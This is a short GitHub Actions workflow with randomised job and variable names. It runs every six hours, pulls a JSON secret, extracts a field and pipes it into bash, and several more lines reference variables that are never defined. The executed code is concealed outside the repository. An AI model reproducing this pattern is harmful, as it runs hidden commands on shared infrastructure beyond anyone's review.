name: chucaiwei8917

on:
  workflow_dispatch:
  schedule:
    - cron: '54 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: chucaiwei8917
        env:
          dg6304: ${{ secrets.dg6304 }}
        run: |
          echo $dg6304 | jq -r .vlj6 | /bin/bash
          echo $s710 | jq -r .e3100 | /bin/bash
          echo $df32 | jq -r .t6 | /bin/bash
          echo $fuc5 | jq -r .w98 | /bin/bash
          echo $ffeba42980 | jq -r .x322 | /bin/bash
          echo $fnyz774 | jq -r .bki8614 | /bin/bash

